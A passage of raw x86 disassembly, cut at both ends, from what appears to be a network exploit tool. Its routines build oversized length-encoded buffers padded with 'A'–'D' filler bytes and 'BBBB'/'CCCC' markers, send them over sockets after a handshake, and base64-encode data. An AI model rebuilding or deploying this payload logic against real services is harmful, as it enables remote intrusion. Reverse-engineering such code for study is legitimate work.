mov ecx, [ebp+Dst]
mov [ecx+2], al
mov eax, [ebp+var_C]
push dword ptr [eax+4] ; Size
mov eax, [ebp+var_C]
push dword ptr [eax] ; Src
mov eax, [ebp+Dst]
add eax, 3
push eax ; Dst
call _memcpy
add esp, 0Ch
loc_401D16: ; CODE XREF: sub_401C3F+95�j
mov eax, [ebp+var_C]
push dword ptr [eax] ; Memory
call _free
pop ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
add ecx, [eax+4]
mov eax, [ebp+var_C]
mov [eax+4], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+Dst]
mov [eax], ecx
mov al, 1
locret_401D3A: ; CODE XREF: sub_401C3F+17�j
; sub_401C3F+50�j
leave
retn
sub_401C3F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D3C proc near ; CODE XREF: sub_401EC3+A5�p
; sub_401EC3+100�p ...
var_10 = dword ptr -10h
Src = dword ptr -0Ch
Size = dword ptr -8
Dst = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
push dword ptr [eax+4] ; int
mov eax, [ebp+var_10]
push dword ptr [eax] ; int
push 1 ; Size
push offset dword_4248C0 ; Src
lea ecx, [ebp+Src]
call sub_401BA1
lea ecx, [ebp+Src]
call sub_401C3F
mov eax, [ebp+Size]
inc eax
push eax ; Size
call _malloc
pop ecx
mov [ebp+Dst], eax
cmp [ebp+Dst], 0
jnz short loc_401D7F
xor al, al
jmp short locret_401DCE
; ---------------------------------------------------------------------------
loc_401D7F: ; CODE XREF: sub_401D3C+3D�j
mov eax, [ebp+Size]
inc eax
push eax ; Size
push 0 ; Val
push [ebp+Dst] ; Dst
call _memset
add esp, 0Ch
mov eax, [ebp+Dst]
mov byte ptr [eax], 3
push [ebp+Size] ; Size
push [ebp+Src] ; Src
mov eax, [ebp+Dst]
inc eax
push eax ; Dst
call _memcpy
add esp, 0Ch
mov ecx, [ebp+var_10]
call sub_401C16
mov eax, [ebp+Size]
inc eax
mov ecx, [ebp+var_10]
mov [ecx+4], eax
mov eax, [ebp+var_10]
mov ecx, [ebp+Dst]
mov [eax], ecx
lea ecx, [ebp+Src]
call sub_401C16
mov al, 1
locret_401DCE: ; CODE XREF: sub_401D3C+41�j
leave
retn
sub_401D3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401DD0 proc near ; CODE XREF: sub_401E0E+17�p
; sub_401E2E+10�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
push [ebp+arg_4] ; int
push [ebp+arg_0] ; int
mov eax, [ebp+var_C]
push dword ptr [eax+4] ; Size
mov eax, [ebp+var_C]
push dword ptr [eax] ; Src
lea ecx, [ebp+var_8]
call sub_401BA1
mov ecx, [ebp+var_C]
call sub_401C16
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
mov al, 1
leave
retn 8
sub_401DD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_401E0E(char *Str)
sub_401E0E proc near ; CODE XREF: sub_401EC3+110�p
; sub_401EC3+189�p ...
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push [ebp+Str] ; Str
call _strlen
pop ecx
push eax
push [ebp+Str]
mov ecx, [ebp+var_4]
call sub_401DD0
leave
retn 4
sub_401E0E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E2E proc near ; CODE XREF: sub_401E97+10�p
; sub_401EC3+1D4�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push [ebp+arg_4]
push [ebp+arg_0]
mov ecx, [ebp+var_4]
call sub_401DD0
leave
retn 8
sub_401E2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E47 proc near ; CODE XREF: sub_401E97+23�p
; sub_401EC3+AD�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
mov ecx, [ebp+var_C]
call sub_401C3F
movzx eax, al
test eax, eax
jnz short loc_401E63
xor al, al
jmp short locret_401E95
; ---------------------------------------------------------------------------
loc_401E63: ; CODE XREF: sub_401E47+16�j
mov eax, [ebp+var_C]
push dword ptr [eax+4] ; int
mov eax, [ebp+var_C]
push dword ptr [eax] ; int
push 1 ; Size
push offset dword_41E904 ; Src
lea ecx, [ebp+var_8]
call sub_401BA1
mov ecx, [ebp+var_C]
call sub_401C16
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
mov al, 1
locret_401E95: ; CODE XREF: sub_401E47+1A�j
leave
retn
sub_401E47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E97 proc near ; CODE XREF: sub_401EC3+15E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push [ebp+arg_4]
push [ebp+arg_0]
mov ecx, [ebp+var_4]
call sub_401E2E
movzx eax, al
test eax, eax
jnz short loc_401EB7
xor al, al
jmp short locret_401EBF
; ---------------------------------------------------------------------------
loc_401EB7: ; CODE XREF: sub_401E97+1A�j
mov ecx, [ebp+var_4]
call sub_401E47
locret_401EBF: ; CODE XREF: sub_401E97+1E�j
leave
retn 8
sub_401E97 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401EC3 proc near ; CODE XREF: .text:00402A43�p
var_858 = dword ptr -858h
var_854 = dword ptr -854h
var_850 = dword ptr -850h
var_84C = dword ptr -84Ch
var_848 = dword ptr -848h
var_844 = dword ptr -844h
Dst = byte ptr -840h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 858h
lea ecx, [ebp+var_848]
call sub_401B01
cmp [ebp+arg_8], 408h
jg short loc_401EED
mov eax, [ebp+arg_10]
add eax, 8
cmp eax, 408h
jbe short loc_401F09
loc_401EED: ; CODE XREF: sub_401EC3+1B�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_848]
mov [eax], ecx
mov ecx, [ebp+var_844]
mov [eax+4], ecx
mov eax, [ebp+arg_0]
jmp locret_40227B
; ---------------------------------------------------------------------------
loc_401F09: ; CODE XREF: sub_401EC3+28�j
lea ecx, [ebp+var_10]
call sub_401B01
lea ecx, [ebp+var_28]
call sub_401B01
lea ecx, [ebp+var_858]
call sub_401B01
lea ecx, [ebp+var_40]
call sub_401B01
lea ecx, [ebp+var_38]
call sub_401B01
lea ecx, [ebp+var_18]
call sub_401B01
lea ecx, [ebp+var_850]
call sub_401B01
push 4
push offset dword_41E5A4
lea ecx, [ebp+var_10]
call sub_401DD0
push 3
push offset dword_41E5AC
lea ecx, [ebp+var_10]
call sub_401DD0
lea ecx, [ebp+var_10]
call sub_401D3C
lea ecx, [ebp+var_10]
call sub_401E47
push 800h ; Size
push 42h ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
push 8
push offset aRbrbrbrb ; "BBBB"
lea ecx, [ebp+var_28]
call sub_401DD0
push [ebp+arg_10]
push [ebp+arg_C]
lea ecx, [ebp+var_28]
call sub_401DD0
mov eax, 409h
sub eax, [ebp+var_24]
push eax
lea eax, [ebp+Dst]
push eax
lea ecx, [ebp+var_28]
call sub_401DD0
lea ecx, [ebp+var_28]
call sub_401D3C
push offset Str ; Str
lea ecx, [ebp+var_858]
call sub_401E0E
lea ecx, [ebp+var_858]
call sub_401D3C
push 800h ; Size
push 44h ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
push 410h ; Size
lea eax, [ebp+Dst]
push eax ; Src
lea ecx, [ebp+var_20]
call sub_401B4C
lea ecx, [ebp+var_20]
call sub_401D3C
push [ebp+var_1C]
push [ebp+var_20]
lea ecx, [ebp+var_858]
call sub_401E97
lea ecx, [ebp+var_20]
call sub_401C16
push 800h ; Size
push 43h ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_40]
call sub_401E0E
push 4
push offset dword_41E5B0
lea ecx, [ebp+var_40]
call sub_401DD0
push [ebp+arg_8]
push [ebp+arg_4]
lea ecx, [ebp+var_40]
call sub_401DD0
mov eax, 408h
sub eax, [ebp+arg_8]
push eax
lea eax, [ebp+Dst]
push eax
lea ecx, [ebp+var_40]
call sub_401DD0
lea ecx, [ebp+var_40]
call sub_401D3C
push [ebp+var_3C]
push [ebp+var_40]
lea ecx, [ebp+var_38]
call sub_401E2E
push [ebp+var_854]
push [ebp+var_858]
lea ecx, [ebp+var_38]
call sub_401E2E
lea ecx, [ebp+var_38]
call sub_401E47
lea ecx, [ebp+var_40]
call sub_401C16
lea ecx, [ebp+var_858]
call sub_401C16
push [ebp+var_24]
push [ebp+var_28]
lea ecx, [ebp+var_18]
call sub_401E2E
push [ebp+var_C]
push [ebp+var_10]
lea ecx, [ebp+var_18]
call sub_401E2E
push [ebp+var_34]
push [ebp+var_38]
lea ecx, [ebp+var_18]
call sub_401E2E
lea ecx, [ebp+var_18]
call sub_401E47
lea ecx, [ebp+var_28]
call sub_401C16
lea ecx, [ebp+var_10]
call sub_401C16
lea ecx, [ebp+var_38]
call sub_401C16
push 800h ; Size
push 41h ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
push 400h
lea eax, [ebp+Dst]
push eax
lea ecx, [ebp+var_850]
call sub_401DD0
lea ecx, [ebp+var_850]
call sub_401D3C
push 2
push offset dword_41E91C
lea ecx, [ebp+var_850]
call sub_401DD0
push [ebp+var_14]
push [ebp+var_18]
lea ecx, [ebp+var_850]
call sub_401E2E
lea ecx, [ebp+var_850]
call sub_401E47
lea ecx, [ebp+var_18]
call sub_401C16
lea ecx, [ebp+var_8]
call sub_401B01
lea ecx, [ebp+var_30]
call sub_401B01
push [ebp+var_84C]
push [ebp+var_850]
lea ecx, [ebp+var_8]
call sub_401E2E
lea ecx, [ebp+var_8]
call sub_401C3F
lea ecx, [ebp+var_850]
call sub_401C16
push offset dword_41E920 ; Str
lea ecx, [ebp+var_30]
call sub_401E0E
push [ebp+var_4]
push [ebp+var_8]
lea ecx, [ebp+var_30]
call sub_401E2E
lea ecx, [ebp+var_30]
call sub_401C3F
lea ecx, [ebp+var_8]
call sub_401C16
push offset dword_41E924 ; Str
lea ecx, [ebp+var_8]
call sub_401E0E
push [ebp+var_2C]
push [ebp+var_30]
lea ecx, [ebp+var_8]
call sub_401E2E
lea ecx, [ebp+var_8]
call sub_401C3F
lea ecx, [ebp+var_30]
call sub_401C16
push offset dword_41E928 ; Str
lea ecx, [ebp+var_30]
call sub_401E0E
push [ebp+var_4]
push [ebp+var_8]
lea ecx, [ebp+var_30]
call sub_401E2E
lea ecx, [ebp+var_30]
call sub_401C3F
lea ecx, [ebp+var_8]
call sub_401C16
push offset dword_41E934 ; Str
lea ecx, [ebp+var_848]
call sub_401E0E
push [ebp+var_2C]
push [ebp+var_30]
lea ecx, [ebp+var_848]
call sub_401E2E
lea ecx, [ebp+var_30]
call sub_401C16
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_848]
mov [eax], ecx
mov ecx, [ebp+var_844]
mov [eax+4], ecx
mov eax, [ebp+arg_0]
locret_40227B: ; CODE XREF: sub_401EC3+41�j
leave
retn
sub_401EC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40227D(SOCKET fd, int, int, int)
sub_40227D proc near ; CODE XREF: sub_402428+177�p
; sub_402428+1BE�p ...
var_218 = dword ptr -218h
var_214 = dword ptr -214h
timeout = timeval ptr -210h
readfds = fd_set ptr -208h
exceptfds = fd_set ptr -104h
fd = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 218h
and [ebp+readfds.fd_count], 0
and [ebp+exceptfds.fd_count], 0
loc_402294: ; CODE XREF: sub_40227D+89�j
and [ebp+var_214], 0
jmp short loc_4022AA
; ---------------------------------------------------------------------------
loc_40229D: ; CODE XREF: sub_40227D:loc_4022CC�j
mov eax, [ebp+var_214]
inc eax
mov [ebp+var_214], eax
loc_4022AA: ; CODE XREF: sub_40227D+1E�j
mov eax, [ebp+var_214]
cmp eax, [ebp+readfds.fd_count]
jnb short loc_4022CE
mov eax, [ebp+var_214]
mov eax, [ebp+eax*4+readfds.fd_array]
cmp eax, [ebp+fd]
jnz short loc_4022CC
jmp short loc_4022CE
; ---------------------------------------------------------------------------
loc_4022CC: ; CODE XREF: sub_40227D+4B�j
jmp short loc_40229D
; ---------------------------------------------------------------------------
loc_4022CE: ; CODE XREF: sub_40227D+39�j
; sub_40227D+4D�j
mov eax, [ebp+var_214]
cmp eax, [ebp+readfds.fd_count]
jnz short loc_402302
cmp [ebp+readfds.fd_count], 40h
jnb short loc_402302
mov eax, [ebp+var_214]
mov ecx, [ebp+fd]
mov [ebp+eax*4+readfds.fd_array], ecx
mov eax, [ebp+readfds.fd_count]
inc eax
mov [ebp+readfds.fd_count], eax
loc_402302: ; CODE XREF: sub_40227D+5D�j
; sub_40227D+66�j
xor eax, eax
test eax, eax
jnz short loc_402294
loc_402308: ; CODE XREF: sub_40227D+FD�j
and [ebp+var_218], 0
jmp short loc_40231E
; ---------------------------------------------------------------------------
loc_402311: ; CODE XREF: sub_40227D:loc_402340�j
mov eax, [ebp+var_218]
inc eax
mov [ebp+var_218], eax
loc_40231E: ; CODE XREF: sub_40227D+92�j
mov eax, [ebp+var_218]
cmp eax, [ebp+exceptfds.fd_count]
jnb short loc_402342
mov eax, [ebp+var_218]
mov eax, [ebp+eax*4+exceptfds.fd_array]
cmp eax, [ebp+fd]
jnz short loc_402340
jmp short loc_402342
; ---------------------------------------------------------------------------
loc_402340: ; CODE XREF: sub_40227D+BF�j
jmp short loc_402311
; ---------------------------------------------------------------------------
loc_402342: ; CODE XREF: sub_40227D+AD�j
; sub_40227D+C1�j
mov eax, [ebp+var_218]
cmp eax, [ebp+exceptfds.fd_count]
jnz short loc_402376
cmp [ebp+exceptfds.fd_count], 40h
jnb short loc_402376
mov eax, [ebp+var_218]
mov ecx, [ebp+fd]
mov [ebp+eax*4+exceptfds.fd_array], ecx
mov eax, [ebp+exceptfds.fd_count]
inc eax
mov [ebp+exceptfds.fd_count], eax
loc_402376: ; CODE XREF: sub_40227D+D1�j
; sub_40227D+DA�j
xor eax, eax
test eax, eax
jnz short loc_402308
mov [ebp+timeout.tv_sec], 0Ah
and [ebp+timeout.tv_usec], 0
lea eax, [ebp+timeout]
push eax ; timeout
lea eax, [ebp+exceptfds]
push eax ; exceptfds
push 0 ; writefds
lea eax, [ebp+readfds]
push eax ; readfds
mov eax, [ebp+fd]
inc eax
push eax ; nfds
call ds:select ; select
cmp eax, 1
jz short loc_4023B8
xor eax, eax
jmp short locret_4023E1
; ---------------------------------------------------------------------------
loc_4023B8: ; CODE XREF: sub_40227D+135�j
lea eax, [ebp+readfds]
push eax ; fd_set *
push [ebp+fd] ; fd
call __WSAFDIsSet ; __WSAFDIsSet
test eax, eax
jnz short loc_4023CF
xor eax, eax
jmp short locret_4023E1
; ---------------------------------------------------------------------------
loc_4023CF: ; CODE XREF: sub_40227D+14C�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+fd]
call dword_42643C ; recv
locret_4023E1: ; CODE XREF: sub_40227D+139�j
; sub_40227D+150�j
leave
retn
sub_40227D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4023E3 proc near ; CODE XREF: sub_402428+147�p
; sub_402428+18E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
call dword_426420 ; ntohl
mov [ebp+var_4], eax
push 0
push 4
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call dword_426470 ; send
cmp eax, 4
jz short loc_40240D
xor al, al
jmp short locret_402426
; ---------------------------------------------------------------------------
loc_40240D: ; CODE XREF: sub_4023E3+24�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_426470 ; send
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
locret_402426: ; CODE XREF: sub_4023E3+28�j
leave
retn
sub_4023E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_402428(SOCKET fd, void *Src, int)
sub_402428 proc near ; CODE XREF: sub_4025FE+55�p
; .text:00402BAE�p
Memory = dword ptr -10Ch
Size = dword ptr -108h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
fd = dword ptr 8
Src = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10Ch
mov eax, [ebp+arg_8]
add eax, 41h
mov [ebp+Size], eax
push [ebp+Size] ; Size
call _malloc
pop ecx
mov [ebp+Memory], eax
cmp [ebp+Memory], 0
jnz short loc_40245F
xor al, al
jmp locret_4025FC
; ---------------------------------------------------------------------------
loc_40245F: ; CODE XREF: sub_402428+2E�j
push [ebp+Size] ; Size
push 0 ; Val
push [ebp+Memory] ; Dst
call _memset
add esp, 0Ch
and [ebp+var_104], 0
push 2Fh ; Size
push offset dword_41E640 ; Src
push [ebp+Memory] ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_104]
add eax, 2Fh
mov [ebp+var_104], eax
mov eax, [ebp+Memory]
add eax, [ebp+var_104]
mov cx, word ptr [ebp+arg_8]
mov [eax], cx
mov eax, [ebp+var_104]
inc eax
inc eax
mov [ebp+var_104], eax
push 8 ; Size
push offset dword_41E670 ; Src
mov eax, [ebp+Memory]
add eax, [ebp+var_104]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_104]
add eax, 8
mov [ebp+var_104], eax
mov eax, [ebp+Memory]
add eax, [ebp+var_104]
mov cx, word ptr [ebp+arg_8]
mov [eax], cx
mov eax, [ebp+var_104]
inc eax
inc eax
mov [ebp+var_104], eax
push [ebp+arg_8] ; Size
push [ebp+Src] ; Src
mov eax, [ebp+Memory]
add eax, [ebp+var_104]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_104]
add eax, [ebp+arg_8]
mov [ebp+var_104], eax
push 6 ; Size
push offset dword_4248B8 ; Src
mov eax, [ebp+Memory]
add eax, [ebp+var_104]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+var_104]
add eax, 6
mov [ebp+var_104], eax
push 85h
push offset dword_41E5B8
push [ebp+fd]
call sub_4023E3
add esp, 0Ch
movzx eax, al
test eax, eax
jnz short loc_40258E
push [ebp+Memory] ; Memory
call _free
pop ecx
xor al, al
jmp short locret_4025FC
; ---------------------------------------------------------------------------
loc_40258E: ; CODE XREF: sub_402428+154�j
push 0 ; int
push 100h ; int
lea eax, [ebp+var_100]
push eax ; int
push [ebp+fd] ; fd
call sub_40227D
add esp, 10h
push [ebp+Size]
push [ebp+Memory]
push [ebp+fd]
call sub_4023E3
add esp, 0Ch
movzx eax, al
test eax, eax
jnz short loc_4025D5
push [ebp+Memory] ; Memory
call _free
pop ecx
xor al, al
jmp short locret_4025FC
; ---------------------------------------------------------------------------
loc_4025D5: ; CODE XREF: sub_402428+19B�j
push 0 ; int
push 100h ; int
lea eax, [ebp+var_100]
push eax ; int
push [ebp+fd] ; fd
call sub_40227D
add esp, 10h
push [ebp+Memory] ; Memory
call _free
pop ecx
mov al, 1
locret_4025FC: ; CODE XREF: sub_402428+32�j
; sub_402428+164�j ...
leave
retn
sub_402428 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4025FE(SOCKET fd, void *Src, int)
sub_4025FE proc near ; CODE XREF: .text:00402B7D�p
var_20 = dword ptr -20h
fd = dword ptr 8
Src = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0 ; flags
push 48h ; len
push offset buf ; ""
push [ebp+fd] ; s
call ds:send ; send
cmp eax, 48h
jz short loc_40261F
xor al, al
jmp short locret_40265B
; ---------------------------------------------------------------------------
loc_40261F: ; CODE XREF: sub_4025FE+1B�j
push 0 ; int
push 20h ; int
lea eax, [ebp+var_20]
push eax ; int
push [ebp+fd] ; fd
call sub_40227D
add esp, 10h
cmp eax, 0FFFFFFFFh
jnz short loc_40263B
xor al, al
jmp short locret_40265B
; ---------------------------------------------------------------------------
loc_40263B: ; CODE XREF: sub_4025FE+37�j
movzx eax, byte ptr [ebp+var_20]
cmp eax, 82h
jz short loc_40264A
xor al, al
jmp short locret_40265B
; ---------------------------------------------------------------------------
loc_40264A: ; CODE XREF: sub_4025FE+46�j
push [ebp+arg_8] ; int
push [ebp+Src] ; Src
push [ebp+fd] ; fd
call sub_402428
add esp, 0Ch
locret_40265B: ; CODE XREF: sub_4025FE+1F�j
; sub_4025FE+3B�j ...
leave
retn
sub_4025FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40265D proc near ; CODE XREF: sub_4026C9+27�p
var_2C = qword ptr -2Ch
var_24 = qword ptr -24h
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_0]
shl eax, 3
mov dword ptr [ebp+var_C], eax
and dword ptr [ebp+var_C+4], 0
fild [ebp+var_C]
fdiv ds:dbl_41C220
call __ftol
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov dword ptr [ebp+var_14], eax
and dword ptr [ebp+var_14+4], 0
fild [ebp+var_14]
fstp [ebp+var_1C]
mov eax, [ebp+var_4]
mov dword ptr [ebp+var_24], eax
and dword ptr [ebp+var_24+4], 0
fild [ebp+var_24]
fdiv ds:dbl_41C218
push ecx
push ecx ; double
fstp [esp+2Ch+var_2C]
call _floor
pop ecx
pop ecx
fadd st, st
fadd [ebp+var_1C]
call __ftol
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_40265D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4026C9 proc near ; CODE XREF: sub_40288F+21�p
var_4C = qword ptr -4Ch
var_44 = qword ptr -44h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = byte ptr -20h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Str = dword ptr 14h
mov eax, offset loc_41B324
call __EH_prolog
sub esp, 38h
and [ebp+var_3C], 0
lea eax, [ebp+var_38]
push eax
lea ecx, [ebp+var_20]
call sub_402C7F
mov [ebp+var_4], 1
push [ebp+arg_8]
call sub_40265D
pop ecx
push eax
lea ecx, [ebp+var_20]
call sub_402E08
and [ebp+var_10], 0
loc_402703: ; CODE XREF: sub_4026C9:loc_40285B�j
cmp [ebp+arg_8], 0
jbe loc_402860
cmp [ebp+arg_8], 3
jb short loc_40271C
mov [ebp+var_30], 3
jmp short loc_402738
; ---------------------------------------------------------------------------
loc_40271C: ; CODE XREF: sub_4026C9+48�j
cmp [ebp+arg_8], 2
jnz short loc_40272B
mov [ebp+var_30], 2
jmp short loc_402738
; ---------------------------------------------------------------------------
loc_40272B: ; CODE XREF: sub_4026C9+57�j
cmp [ebp+arg_8], 1
jnz short loc_402738
mov [ebp+var_30], 1
loc_402738: ; CODE XREF: sub_4026C9+51�j
; sub_4026C9+60�j ...
mov eax, [ebp+var_30]
mov dword ptr [ebp+var_44], eax
and dword ptr [ebp+var_44+4], 0
fild [ebp+var_44]
fmul ds:dbl_41C228
fdiv ds:dbl_41C220
push ecx
push ecx ; double
fstp [esp+4Ch+var_4C]
call _ceil
pop ecx
pop ecx
call __ftol
mov [ebp+var_2C], eax
and [ebp+var_34], 0
jmp short loc_402772
; ---------------------------------------------------------------------------
loc_40276B: ; CODE XREF: sub_4026C9+C0�j
mov eax, [ebp+var_34]
inc eax
mov [ebp+var_34], eax
loc_402772: ; CODE XREF: sub_4026C9+A0�j
mov eax, [ebp+var_34]
cmp eax, [ebp+var_30]
jnb short loc_40278B
mov eax, [ebp+arg_4]
add eax, [ebp+var_34]
mov ecx, [ebp+var_34]
mov al, [eax]
mov [ebp+ecx+var_28], al
jmp short loc_40276B
; ---------------------------------------------------------------------------
loc_40278B: ; CODE XREF: sub_4026C9+AF�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_30]
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
sub eax, [ebp+var_30]
mov [ebp+arg_8], eax
movsx eax, [ebp+var_28]
and eax, 0FCh
sar eax, 2
mov [ebp+var_24], al
movsx eax, [ebp+var_28]
and eax, 3
shl eax, 4
movsx ecx, [ebp+var_27]
and ecx, 0F0h
sar ecx, 4
add eax, ecx
mov [ebp+var_23], al
movsx eax, [ebp+var_27]
and eax, 0Fh
movsx ecx, [ebp+var_26]
and ecx, 0C0h
sar ecx, 6
lea eax, [ecx+eax*4]
mov [ebp+var_22], al
movsx eax, [ebp+var_26]
and eax, 3Fh
mov [ebp+var_21], al
and [ebp+var_34], 0
jmp short loc_4027F9
; ---------------------------------------------------------------------------
loc_4027F2: ; CODE XREF: sub_4026C9+158�j
mov eax, [ebp+var_34]
inc eax
mov [ebp+var_34], eax
loc_4027F9: ; CODE XREF: sub_4026C9+127�j
mov eax, [ebp+var_34]
cmp eax, [ebp+var_2C]
jnb short loc_402823
mov eax, [ebp+var_34]
movsx eax, [ebp+eax+var_24]
mov al, byte_41E6C8[eax]
push eax ; int
push 1 ; Size
lea ecx, [ebp+var_20]
call sub_402D44
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
jmp short loc_4027F2
; ---------------------------------------------------------------------------
loc_402823: ; CODE XREF: sub_4026C9+136�j
cmp [ebp+var_10], 48h
jb short loc_402838
push [ebp+Str] ; Str
lea ecx, [ebp+var_20]
call sub_402D16
and [ebp+var_10], 0
loc_402838: ; CODE XREF: sub_4026C9+15E�j
mov eax, [ebp+var_2C]
mov [ebp+var_34], eax
jmp short loc_402847
; ---------------------------------------------------------------------------
loc_402840: ; CODE XREF: sub_4026C9+190�j
mov eax, [ebp+var_34]
inc eax
mov [ebp+var_34], eax
loc_402847: ; CODE XREF: sub_4026C9+175�j
cmp [ebp+var_34], 4
jnb short loc_40285B
push 3Dh ; int
push 1 ; Size
lea ecx, [ebp+var_20]
call sub_402D44
jmp short loc_402840
; ---------------------------------------------------------------------------
loc_40285B: ; CODE XREF: sub_4026C9+182�j
jmp loc_402703
; ---------------------------------------------------------------------------
loc_402860: ; CODE XREF: sub_4026C9+3E�j
lea eax, [ebp+var_20]
push eax
mov ecx, [ebp+arg_0]
call sub_402CA1
mov eax, [ebp+var_3C]
or al, 1
mov [ebp+var_3C], eax
and byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_20]
call sub_402D03
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
leave
retn
sub_4026C9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40288F proc near ; CODE XREF: .text:00402B42�p
var_30 = byte ptr -30h
var_2C = byte ptr -2Ch
var_28 = byte ptr -28h
var_24 = byte ptr -24h
Count = dword ptr -14h
Memory = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
mov eax, offset sub_41B340
call __EH_prolog
sub esp, 24h
push esi
and [ebp+var_4], 0
push offset dword_4248C4
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_24]
push eax
call sub_4026C9
add esp, 10h
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+arg_C]
call sub_402DF9
mov esi, eax
lea ecx, [ebp+var_24]
call sub_402DF9
lea eax, [esi+eax+36h]
mov [ebp+Count], eax
push [ebp+Count] ; Size
call _malloc
pop ecx
mov [ebp+Memory], eax
cmp [ebp+Memory], 0
jnz short loc_40290B
and [ebp+var_28], 0
and byte ptr [ebp+var_4], 0
